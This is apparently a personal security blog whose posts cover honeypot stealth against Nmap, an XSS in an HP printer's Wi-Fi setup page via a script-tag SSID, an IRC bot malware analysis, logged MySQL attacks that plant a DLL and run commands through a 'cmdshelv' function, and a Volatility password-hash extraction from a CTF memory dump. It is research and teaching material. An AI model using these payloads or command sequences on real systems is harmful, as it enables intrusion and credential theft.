Steeve Barbeau's blog

Sunday, June 10, 2012

Make Dionaea stealthier for fun and no profit

I'm in my "honeypot playing period" and I've tried to scan my Dionaea with Nmap which detect of course lots of port listening but more annoying, last versions of Nmap are able to see that some services are provided by Dionaea ...

So if you want your Honeypot to be stealthier you can apply some tricks. Before to modify Dionaea services behavior, you have to know how Nmap services fingerprint feature works (I will only speak about Nmap, because that's the most used ports scanner, it's up to you to try with others).

In order to be able to discover the name and version of a service, Nmap use Perl Compatible Regular Expressions. All these regexp are stored in /usr/share/nmap/nmap-service-probes (path can change according to OS). If you want to understand nmap-service-probes file's syntax, I recommend you to read this. Below, some probes extracted from this file :

So if we want to hide our Dionaea honeypot from Nmap users, we have to modify Dionaea behavior to unmatch Nmap probes. First, list all Dionaea probes of this file :

[steeve@omega ~]$ cat /usr/share/nmap/nmap-service-probes | grep Dionaea

We can see that Nmap is able to detect "only" 4 services offered by Dionaea : FTP, HTTP, MSSQL and SMB. I will show you how we can deceive Nmap by modifying few files in Dionaea. I won't show you how to tweak MSSQL service because I haven't make deeper and this service looks a bit more complicated ... (If you have a solution, you can send me a mail or share in comments :-)

First, if we look at the FTP probe, we can see that Nmap only checks the connection banner. So we just have to change it, and Nmap will be lost in its attempt to retrieve service name and version. For sure we can put any banner, but the best thing to do (in my opinion) is to try to act like a real FTP server. Shodan is a great tool to help us to know how to simulate FTP servers, check this link. I have choose to use MS FTP banner : "Microsoft FTP Service".

So we have to edit the Ftp python file located in : /opt/dionaea/lib/dionaea/python/dionaea/ftp.py. Now you just have to replace "Welcome to the ftp service" by the banner of your choice :

If we check HTTP Nmap probe, we can see that's a static one, no regexp used. This probe is based on HTTP headers and HTML source code. There is at least two simple solutions. We can see that HTTP service lists the directory content, so first we can decide to simply put a file in /opt/dionaea/var/dionaea/wwwroot directory, and HTML source code will be different and won't check probe anymore. The second solution is to modify the HTML code sent by Dionaea in /opt/dionaea/lib/dionaea/python/dionaea/http.py. For example, in list_directory(), we can change DTD, title page ...

SMB probe provided by Nmap is based on the value of two fields of the SMB Negotiate Protocol Response : "OemDomainName" and "ServerName". Nmap expects to receive respectively "WORKGROUP" and "HOMEUSER-XXXXXX" where X represent random data. It seems quite easy to mislead Nmap on SMB service too. We just have to modify those values in SMB_Negociate_Protocol_Response class of file /opt/dionaea/lib/dionaea/python/dionaea/smb/include/smbfields.py. Let's try with "HINMAP" and "TRYHARDER".

You can see results of our tricks just below. Sure, that's not perfect but it's better than nothing ;-)

In this blog post, I've shown you how to use Nmap probes to "protect" your honeypot, but you can do the opposite adding new probes to get a more powerfull Nmap. In addition, it will be interesting to modify MSSQL behavior and SSL certificates to obtain a no verbose honeypot (look at the first scan for SSL certificates details).

FYI : Markus, Dionaea's creator, won't fix Dionaea regarding to Nmap (or other scanners) possible detection. It's a cat-and-mouse game that he can't win because some protocols are tricky to implement and modify whereas Nmap probes are very easy to add. You can read this mail on Nepenthes mailing list.

Monday, April 23, 2012

XSS on HP printer web interface

Yesterday I was watching a Defcon 19 talk about multi-function printer security which was pretty fun. So this give me an idea : what about mine ? For sure, I have not a professional printer which can be connected to an LDAP or whatever, but my printer (HP Deskjet 3070A) has network access too :)

According to Nmap, lots of TCP port seem opened :

Starting Nmap 5.21 ( http://nmap.org ) at 2012-04-22 21:16 CEST
Nmap scan report for HP7D7AA8 (192.168.1.23)
Host is up (0.28s latency).
Not shown: 65520 closed ports
PORT STATE SERVICE
80/tcp open http
443/tcp open https
631/tcp open ipp
3910/tcp open unknown
3911/tcp open unknown
6839/tcp open unknown
7435/tcp open unknown
8080/tcp open http-proxy
9100/tcp open jetdirect
9101/tcp open jetdirect
9102/tcp open jetdirect
9110/tcp open unknown
9111/tcp open DragonIDSConsole
9112/tcp open unknown
9220/tcp open unknown
9290/tcp open unknown
MAC Address: 2C:76:8A:7D:7A:A8 (Unknown)
Nmap done: 1 IP address (1 host up) scanned in 855.57 seconds

Ok cool, let's see the HTTP server and the Web interface ...

Printer's HTTP server name is too verbose, it looks like :

HP HTTP Server; HP Deskjet 3070 B611 series - 012345; Serial Number: 0123456789ABCD; Munich_mp1 Built:Thu Apr 28, 2011 03:49:36PM {0123456789ABC, ASIC id 0x00340100}

Yes we can get the serial number from the HTTP Server header :)

Now if we take a look on the web interface, we can found a fun XSS. As this printer is Wifi capable, we can configure Wifi using this interface. But what about a cool SSID like "<script> alert('owned?') </script>" ?

I let you setup your AP with aforementioned SSID. Note than you can use an Android phone, it's easy and quick to configure :)

As soon as this Wifi AP is setup, you can configure you printer to use it : Network > Wireless Setup Wizard (https://<IP>/#hId-setupPage).

Click on "Start Wizard" :

We can see our new AP :

Now if we select it and click on "Next", we get our XSS :D

Sunday, January 29, 2012

Caught and analyzed

In last september, I was playing with Dionaea honeypot which is a great tool (see previous article). After have caught some malwares I would to analyse one of them.

Informations about the file

According to the VirusTotal report, the file I've choose to analyzed is an IRC bot. VT shows an interesting information : the malware seems to be packed with PolyCrypt. In fact the packer version is exactly PolyCrypt PE 2.1.5. During the analysis I have found these string relating to the packer software : "PolyCrypt PE (c) 2004-2005, JLabSoftware.".

After unpacking, we can take a look to the imported DLL and functions : details here

And now we can start the real work : the reverse of the malware !

Let's start the analysis

At startup, the malware creates a script file located at c:\a.bat. The script can be downloaded here.

The script creates file 1.reg in temp directory (c:\Documents and Settings\%user%\Local Settings\Temp), then run regedit with the created reg file before to delete 1.reg and himself.

The reg file disables DCOM, RemoteConnect, restricts anonymous access, disables admin shares (for example C$), changes a lot of TCP/IP parameters and increases the number of possible simultaneous connections to a single HTTP 1.0/1.1 server (50 and 50 instead of respectively 4 and 2). It's obvious that the aim of this last registry modification is to increase DOS effects.

After that registry tweaking, the malware copy himself in c:\windows\system32\host.exe (host.exe is the original filename during spreading). It sets the create, modify and access time of explorer.exe to host.exe. Then, it runs the malware copy which will delete the first malware file.

The malware will edit registry to be executed after reboot. So it adds an entry in HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\{Run,RunServices} and in HKEY_CURRENT_USER\Software\Microsoft\OLE named "Windows Update" with "host.exe" as value. Then a thread checks running processes every 30 seconds, a list of around 600 process name is parsed. A second thread disables DCOM, restricts anonymous access and disables IPC$ share every 2 minutes. And the last created thread, checks every 120 milliseconds that the malware will be executing at OS startup. After the creation of these 3 threads, Internet status is checked every 30 seconds and if the victim host has Internet access, the payload is run.

Payload

Of course, as this malware is an IRC bot, it implements some IRC commands like USER, PASS, NICK, JOIN, PONG, NOTICE, PRIVMSG, QUIT... After each action, the bot will send to the IRC C&C server NOTICE or PRIVMSG message to report the success or not of the action.

This payload has many features :

- keylogger

- Ping, TCP, UDP, HTTP flood

- DNS cache flush

- ARP table flush

- send email (spam)

- search files and directories

- move files

- get informations about the system : CPU number, CPU frequency, memory usage, disk space, disk type (network, cdrom ...), username, OS version (95, 98, ME, NT, 2000, 2003, XP or Unkown), user domain ...

- get informations about the network : IP, hostname, connection type

- get serial of 42 games (Counter-Strike, FIFA 2003... whole list here), Windows product key and the customer number

- get clipboard data

- list running AV/FW and other "security products" (ollydbg ...). The list contains around 600 processes.

- list registered services and their status (unknown, paused, pausing, continuing, starting, stoping, stoped, running, stopped)

- manage services

- restore the system in a healthy state (delete the registry key and the malware file)

- download and run binary files

- send files

- kill processes

- reverse shell (after authentication on the bot)

- update mecanism

- network sniffing

- TCP ports scan

- basic FTP server

- basic HTTP server used to download files and to send back file and directory search report

- bruteforce SQL server using a built-in list of around 1700 passwords (list here). If logon success, it will download by FTP the malware and run it thanks to "EXEC master..xp_cmdshell".

- video recording using webcam

- screenshot capabilities

- add $C, $IPC, and $ADMIN network shares

- ...

Commands

A non-exhaustive list of IRC commands can be downloaded here.

C&C

Botnet owners use IRC to exchange informations with bots, send commands ... The domain name used to contact the C&C is blah.swXXXXXXXme.com and seems to be located in England (isp : ValueVPS Limited - Hosting network). The IRC server used by this C&C server is UnrealIRCd 3.2.7 which is listening on port 7878. Channels listed are #GuardBot-Admin, #uk, #fuckoff and #b (joined by bots). A password (imallowed2020) is required to join #b channel.

Bots name are something similare to [GSA]-123456.

Port 7878 isn't the only open port :

80/tcp open http Apache httpd 2.2.14 ((Fedora))
99/tcp open ssh OpenSSH 5.1 (protocol 2.0)
6001/tcp open irc Unreal ircd (used to link to other irc servers)
7878/tcp open irc Unreal ircd (used by irc clients)
10000/tcp open http MiniServ 1.530 (Webmin httpd)
65146/tcp open irc Unreal ircd (used by irc clients)

Apache is hosting the default apache webpage and on port 10000 we can find Webmin interface to administrate the server.

OS seems to be a Fedora 12 with a 2.6 kernel.

This C&C server doesn't control a huge botnet. I have done several connections to this botnet, and the number of bots was between 467 and 1393. According IRC stats, the max number of IRC users (bots) was 4088.

STATS u

:pwned28.ircd.net 242 [GSA]-370921 :Server Up 0 days, 21:46:20

:pwned28.ircd.net 250 [GSA]-370921 :Highest connection count: 1393 (4088 clients)

In addition, this server suffer from reliability problems. During my analysis, it was sometimes unavailable (january 9th, 12th...).

How to delete it ?

As this malware isn't an advanced one, it's easy to remove it from an infected computer. First you have to kill "host.exe" process using task manager or an other tool. Then you must delete the file "host.exe" located in c:\windows\system32\. With default view options, the file is invisible. You need to uncheck "Hide protected operating system files" in Windows view options. Finally, in the registry you have to delete the key "Windows Update" stored in HKEY_CURRENT_USER\Software\Microsoft\OLE and in HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\{Run,RunServices}. It could be great to restore all other registry values modified by a.bat file at the beginning of the infection but you will need original values to do that ...

Comments

This malware isn't very stealth because we can found it quite easily in file system and it's even easier with task manager. According to Windows version that the malware can detect and the list of games, I can say that's an old malware with no advanced protections against RE.

Nowadays, some (a lot of ?) malware are developed by governments and cybercriminal groups. I think that's not the case of this trojan because of its "simplicity", the unreliable C&C server and some strings found in it, like "Goodbye happy r00ting.", "NzmxFtpd Owns j0" and "Nice try, idiot." doesn't look professionnal.

I have found on the Internet, a SNORT rules file which list IP address used by the C&C server. So if you have an IDS in your company, you can use this rules file which contains a list of known C&C servers, to generate alerts when an host is communicating with one of these servers.

Sunday, October 9, 2011

Some stats of my dionaea honeypot

Last month, my PC was running Dionaea honeypot during two periods of some days. So I decided to share some statistics about the attacked services, localization of the attacker, OS of the attacker ...
I have also list SQL requests used to get these informations.

P0f informations

P0f is a passive OS fingerprinting tool which will analyze network traffic to get informations like operating system version, firewall presence, NAT use, distance to the remote host and also about the kind of link used.
FYI : You need to enable p0f in dionaea configuration file and run p0f tool in order to have these datas.

select count(p0f_genre||p0f_detail) as count, (p0f_genre || " " || p0f_detail) as OS from p0fs group by (p0f_genre||p0f_detail) order by count desc;

count	OS
7509
104	Windows 2000 SP4, XP SP1+
46	Windows XP/2000 (RFC1323+, w+, tstamp-)
31	Windows 2000 SP2+, XP SP1+ (seldom 98)
17	Linux 2.6 (newer, 3)
11	Linux 2.6 (newer, 2)
8	Windows XP SP1+, 2000 SP3
7	Linux 2.4-2.6
6	Windows XP/2000 (RFC1323+, w, tstamp+)
3	Windows 95
2	SunOS 4.1.x
1	Linux 2.6? (barebone, rare!)
1	Windows 98 (no sack)

select count(p0f_link) as count, p0f_link as link from p0fs group by p0f_link order by count desc;

count	link
6051
1533	ethernet/modem
101	pppoe (DSL)
39	IPv6/IPIP
10	(Google/AOL)
5	GPRS, T1, FreeS/WAN
3	PIX, SMC, sometimes wireless
3	sometimes DSL (2)
1	vtun

Targeted local port

select count(local_port) as count, local_port as "targeted port" from connections group by local_port order by count desc;

count	targeted port
1201	42
335	80
123	135
113	1433
87	32554
72	32045
61	5060
38	3389
38	8008
37	23
...
18	445
...

Services most targeted here are WINS, Web servers, Epmap/DCOM, SQL Server, Sip, RDP, Telnet.

Location of attackers / malware sources

select count(remote_host) as count, remote_host from connections group by remote_host order by count desc;

If we look at the map, we can see lot of connections from France. But I can explain some of them, because when my honeypot was running, I have launched some ports scan. In order to have reliable statistics, I have removed of the sqlite database connections coming from my IP but I think I've omitted some of them.

Protocol informations

select count(connection_transport) as count, connection_transport from connections group by connection_transport order by count desc;

count	connection_transport
6959	tcp
85	udp
13	tls

select count(connection_protocol) as count, connection_protocol from connections group by connection_protocol order by count desc;

count	connection_protocol
3929	pcap
1204	mirrorc
1201	mirrord
335	httpd
123	epmapper
113	mssqld
70	SipSession
54	TftpClient
17	smbd
7	mysqld
4	SipCall

Default passwords

select count(logins.login_username||logins.login_password) as count, logins.login_username, logins.login_password, connections.connection_protocol, connections.local_port from logins, connections where connections.connection = logins.connection group by (logins.login_username||logins.login_password) order by count desc;

count	login_username	login_password	connection_protocol	local_port
95	sa		mssqld	1433
6	root		mysqld	3306

Malwares targeting my honeypot have tried to connect to MySQL with root/ and to Microsoft SQL Server with sa/ which are both default credentials.

MySQL requests

select * from mysql_command_args;

Look output of this request is quite fun :

drop function cmdshell
drop function cmdshell
drop function my_udfdoor
drop function my_udfdoor
drop function do_system
drop function do_system
use mysql;
use mysql;
drop table if exists tempMix4;
drop table if exists tempMix4;
create table if not exists tempMix4(data LONGBLOB);
create table if not exists tempMix4(data LONGBLOB);
set @a = concat('',0x4D5A90000300000004000000FFFF .....00000000000000);
set @a = concat('',0x4D5A90000300000004000000FFFF .....00000000000000);
INSERT INTO tempMix4 VALUES (@a);
select data from tempMix4 into DUMPFILE 'C:\\12345.exe';
drop table if exists tempMix4;
use mysql;
drop table if exists tempMix;
create table if not exists tempMix(data LONGBLOB);
set @a = concat('',0x4D5A90000300000004000000FFFF .....00000000000000);
INSERT INTO tempMix VALUES (@a);
select data from tempMix into DUMPFILE 'C:\\WINDOWS\\amd.dll'
INSERT INTO tempMix4 VALUES (@a);
select data from tempMix into DUMPFILE 'C:\\WINT\\amd.dll'
select data from tempMix4 into DUMPFILE 'C:\\12345.exe';
select data from tempMix into DUMPFILE 'C:\\WINDOWS\\SYSTEM32\\amd.dll'
select data from tempMix into DUMPFILE 'C:\\WINT\\amd.dll'
select data from tempMix into DUMPFILE '..\\lib\\plugin\\amd.dll'
drop table if exists tempMix4;
select data from tempMix into DUMPFILE 'D:\\amd.dll'
use mysql;
select data from tempMix into DUMPFILE '..\\bin\\amd.dll'
drop table if exists tempMix;
create table if not exists tempMix(data LONGBLOB);
create function cmdshelv returns string soname 'amd.dll';
create function cmdshelv returns string soname 'amd.dll'
create function cmdshelv returns string soname 'C:\\WINDOWS\\system32\\amd.dll'
create function cmdshelv returns string soname 'C:\\WINNT\\amd.dll'
create function cmdshelv returns string soname 'C:\\WINDOWS\\SYSTEM32\\amd.dll';
create function cmdshelv returns string soname 'C:\\WINNT\\amd.dll';
create function cmdshelv returns string soname 'amd.dll'
select cmdshelv('c:\\12345.exe')
select cmdshelv('c:\\12345.exe');
set @a = concat('',0x4D5A90000300000004000000FFFF .....00000000000000);
select cmdshelv('cmd.exe cmd/c del c:\12345.exe');

For more informations, you can read this article : http://carnivore.it/2011/06/12/the_mysql_cmdshelv

RPC vulnerabilities

select dcerpcservices.dcerpcservice_name, dcerpcserviceops.dcerpcserviceop_name, dcerpcserviceops.dcerpcserviceop_vuln from dcerpcservices, dcerpcserviceops where dcerpcservices.dcerpcservice = dcerpcserviceops.dcerpcservice and dcerpcserviceop_vuln is not "";

dcerpcservice_name	dcerpcserviceop_name	dcerpcserviceop_vuln
DCOM	RemoteActivation	MS03-26
DSSETUP	DsRolerUpgradeDownlevelServer	MS04-11
ISystemActivator	RemoteCreateInstance	MS04-12
MSMQ	QMCreateObjectInternal	MS07-065
MSMQ	QMDeleteObject	MS05-017
NWWKS	NwChangePassword	MS06-66
NWWKS	NwOpenEnumNdsSubTrees	MS06-66
PNP	PNP_QueryResConfList	MS05-39
SRVSVC	NetPathCanonicalize	MS08-67
SRVSVC	NetPathCompare	MS08-67
WKSSVC	NetAddAlternateComputerName	MS03-39
nddeapi	NDdeSetTrustedShareW	MS04-031

Malware URLs

select downloads.download_url, downloads.download_md5_hash,connections.local_port from downloads, connections where downloads.connection=connections.connection;

All malwares have been downloaded on TFTP servers and are link to connections with port 135. As URLs are pointing to malwares, I won't show them here.

Virustotal reports

Thursday, June 23, 2011

HTTP support in Scapy

"Scapy is a powerful interactive packet manipulation program. It is able to forge or decode packets of a wide number of protocols, send them on the wire, capture them, match requests and replies, and much more. It can easily handle most classical tasks like scanning, tracerouting, probing, unit tests, attacks or network discovery (it can replace hping, 85% of nmap, arpspoof, arp-sk, arping, tcpdump, tethereal, p0f, etc.)." http://www.secdev.org/projects/scapy/

Scapy's documentation is very interesting to learn how to use it and how to add new protocols. To become more familiar with this great tool, I've decided to try to implement one of the most used protocol : HTTP (RFC 2616).

steeve-pc:blog steeve$ ./HTTP.py
Welcome to Scapy (2.2.0)
HTTP Scapy extension
>>> test=rdpcap("HTTP.pcap")
>>> test.summary()
Ether / IP / TCP 145.254.160.237:tip2 > 65.208.228.223:http S
Ether / IP / TCP 65.208.228.223:http > 145.254.160.237:tip2 SA
Ether / IP / TCP 145.254.160.237:tip2 > 65.208.228.223:http A
Ether / IP / TCP 145.254.160.237:tip2 > 65.208.228.223:http PA / HTTP / HTTPrequest / Raw
Ether / IP / TCP 65.208.228.223:http > 145.254.160.237:tip2 A
Ether / IP / TCP 65.208.228.223:http > 145.254.160.237:tip2 A / HTTP / HTTPresponse / Raw
Ether / IP / TCP 145.254.160.237:tip2 > 65.208.228.223:http A
Ether / IP / TCP 65.208.228.223:http > 145.254.160.237:tip2 A / HTTP / Raw
Ether / IP / TCP 145.254.160.237:tip2 > 65.208.228.223:http A
Ether / IP / TCP 65.208.228.223:http > 145.254.160.237:tip2 A / HTTP / Raw
Ether / IP / TCP 65.208.228.223:http > 145.254.160.237:tip2 PA / HTTP / Raw
Ether / IP / TCP 145.254.160.237:tip2 > 65.208.228.223:http A
[...]

The function summary() shows the content of each packet and here we can see that we have packets with interesting layers : HTTP, HTTPrequest and HTTPresponse. HTTP layer contains all the fields that can be in the 2 other layers like Date or Connection fields. HTTPrequest layer corresponds to HTTP request (GET, POST, TRACE, HEAD ...) and HTTPresponse to "200 OK", "404 Not Found"... webpages.

We can see the content of the paquet containing the HTTPrequest layer :

>>> test[3].show()
###[ Ethernet ]###
dst= fe:ff:20:00:01:00
src= 00:00:01:00:00:00
type= 0x800
###[ IP ]###
version= 4L
ihl= 5L
tos= 0x0
len= 519
id= 3909
flags= DF
frag= 0L
ttl= 128
proto= tcp
chksum= 0x9010
src= 145.254.160.237
dst= 65.208.228.223
\options\
###[ TCP ]###
sport= tip2
dport= http
seq= 951057940
ack= 290218380
dataofs= 5L
reserved= 0L
flags= PA
window= 9660
chksum= 0xa958
urgptr= 0
options= []
###[ HTTP ]###
CacheControl= None
Connection= 'Connection: keep-alive\r\n'
Date= None
Pragma= None
Trailer= None
TransferEncoding= None
Upgrade= None
Via= None
Warning= None
KeepAlive= 'Keep-Alive: 300\r\n'
Allow= None
ContentEncoding= None
ContentLanguage= None
ContentLength= None
ContentLocation= None
ContentMD5= None
ContentRange= None
ContentType= None
Expires= None
LastModified= None
###[ HTTP Request ]###
Method= 'GET /download.html HTTP/1.1\r\n'
Host= 'Host: www.ethereal.com\r\n'
UserAgent= 'User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.6) Gecko/20040113\r\n'
Accept= 'Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,image/jpeg,image/gif;q=0.2,*/*;q=0.1\r\n'
AcceptLanguage= 'Accept-Language: en-us,en;q=0.5\r\n'
AcceptEncoding= 'Accept-Encoding: gzip,deflate\r\n'
AcceptCharset= 'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n'
Referer= 'Referer: http://www.ethereal.com/development.html\r\n'
Authorization= None
Expect= None
From= None
IfMatch= None
IfModifiedSince= None
IfNoneMatch= None
IfRange= None
IfUnmodifiedSince= None
MaxForwards= None
ProxyAuthorization= None
Range= None
TE= None
###[ Raw ]###
load= '\r\n'

Now we can easily manipulate HTTP packets with Scapy. Here, I will filter packets with HTTPrequest or HTTPresponse layer and then print some fields :

>>> http=test.filter(lambda(s): HTTPrequest in s or HTTPresponse in s)
>>> http.summary()
Ether / IP / TCP 145.254.160.237:tip2 > 65.208.228.223:http PA / HTTP / HTTPrequest / Raw
Ether / IP / TCP 65.208.228.223:http > 145.254.160.237:tip2 A / HTTP / HTTPresponse / Raw
Ether / IP / TCP 145.254.160.237:3371 > 216.239.59.99:http PA / HTTP / HTTPrequest / Raw
Ether / IP / TCP 216.239.59.99:http > 145.254.160.237:3371 PA / HTTP / HTTPresponse / Raw
Ether / IP / TCP 216.239.59.99:http > 145.254.160.237:3371 PA / HTTP / HTTPresponse / Raw
>>> for p in http.filter(lambda(s): HTTPrequest in s):
... print p.Method, p.Host
...
GET /download.html HTTP/1.1
Host: www.ethereal.com
GET /pagead/ads?client=ca-pub-2309191948673629&random=1084443430285&lmt=1082467020&format=468x60_as&output=html&url=http%3A%2F%2Fwww.ethereal.com%2Fdownload.html&color_bg=FFFFFF&color_text=333333&color_link=000000&color_url=666633&color_border=666633 HTTP/1.1
Host: pagead2.googlesyndication.com
>>> for p in http.filter(lambda(s): HTTPresponse in s):
... print p.StatusLine, p.Server
...
HTTP/1.1 200 OK
Server: Apache
HTTP/1.1 200 OK
Server: CAFE/1.0
HTTP/1.1 200 OK
Server: CAFE/1.0
>>>

My script can be downloaded here. Don't hesitate to give me your opinion or to improve my script ;)

Saturday, March 19, 2011

Get password from memory dump

To explain how we can get password from memory dump, I will use forensic challenge #2 from "Nuit du Hack 2010" as example.
Aim : extract Administrator password from the Windows XP memory dump

We will use a great tool to extract this password which is : Volatility. Volatility has a plugin called "hashdump" to extract password hashes. So we have to use it, but before we have to locate virtual address of SYSTEM and SAM hive.

Find physical adresses of registry hives (hivescan plugin) :

user@ubuntu-vm:~/Desktop/volatility$ python volatility.py -f ../xp_forensics.vmem --profile=WinXPSP3x86 hivescan
Volatile Systems Volatility Framework 1.4_rc1
Offset (hex)
44666888 0x02a99008
44694368 0x02a9fb60
[...]
380343784 0x16ab95e8
424820744 0x19524008

Then locate virtual addresses (hivelist plugin) :

user@ubuntu-vm:~/Desktop/volatility$ python volatility.py -f ../xp_forensics.vmem --profile=WinXPSP3x86 hivelist
Volatile Systems Volatility Framework 1.4_rc1
Virtual Physical Name
0xe1cf9008 0x19524008 \??\C:\Documents and Settings\mr_esclave\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat
[...]
0xe15fdb60 0x0688ab60 \Device\HarddiskVolume1\WINDOWS\system32\config\software
0xe15ebb60 0x06708b60 \Device\HarddiskVolume1\WINDOWS\system32\config\default
0xe15fd008 0x0688a008 \Device\HarddiskVolume1\WINDOWS\system32\config\SECURITY
0xe15f2658 0x066cf658 \Device\HarddiskVolume1\WINDOWS\system32\config\SAM
0xe12eb288 0x02d58288 [no name]
0xe1035b60 0x02a9fb60 \Device\HarddiskVolume1\WINDOWS\system32\config\system
0xe102e008 0x02a99008 [no name]
0x8066e904 0x0066e904 [no name]

Now we have SYSTEM and SAM virtual addresses, so we can run hashdump plugin :

user@ubuntu-vm:~/Desktop/volatility$ python volatility.py -f ../xp_forensics.vmem --profile=WinXPSP3x86 hashdump -y 0xe1035b60 -s 0xe15f2658
Volatile Systems Volatility Framework 1.4_rc1
Administrateur:500:a94c6377a507e293d87f0f06a65161cd:ca5cf9cfc07ec43a78d00bc936242594:::

Last step is to use ophcrack with rainbow tables to crack this password :

We have easily got Administrator's password which is "cuirmoustache".

Nuit du Hack challenges : http://wargame.nuitduhack.com/
Volatility plugin list : http://code.google.com/p/volatility/wiki/CommandReference

Sunday, February 27, 2011

Use Metasploit as email client

This metasploit plugin is my first piece of Ruby code and is a very basic email client. With this plugin you can send emails (by smtp), and receive unread mails by imap. Download my metasploit plugin.

Send mails :

msf > load mail_client
[*] Mail Client plugin loaded.
[*] Successfully loaded plugin: MailClient
msf > send_mail
Enter your smtp password :
Use ';' for multiple recipients
To : email@mail.com
Subject : Test metasploit plugin
Message :
Is my plugin working ?? We will see ...

Send ...
msf >

Get mails :

msf > get_mails

0. Sun, 27 Feb 2011 00:11:58 +0000 - Test metasploit plugin
? read 0
Is my plugin working ?? We will see ...

Sent from Metasploit
----------
? help
read X
list
help
exit
?

This plugin uses basic Net::IMAP from Ruby, so authentication is limited to "LOGIN" and "CRAM-MD5" authentication mechanisms. I have not added OAUTH used by Gmail or others kinds of "high level" authentication methods.

Pages